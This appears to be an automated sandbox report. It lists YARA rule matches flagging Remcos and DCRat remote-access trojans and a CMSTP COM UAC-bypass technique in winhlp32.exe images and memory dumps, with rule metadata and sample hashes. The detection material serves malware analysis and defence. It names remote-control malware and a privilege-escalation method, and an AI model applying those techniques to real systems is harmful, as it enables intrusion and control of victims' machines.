        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000004.00000002.3316092029.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000008.00000002.2081271482.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000006.00000002.2078678717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000004.00000002.3309788726.0000000003118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000004.00000002.3309788726.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000008.00000002.2085488605.0000000005756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000008.00000002.2081271482.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 0000000A.00000002.2085289507.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
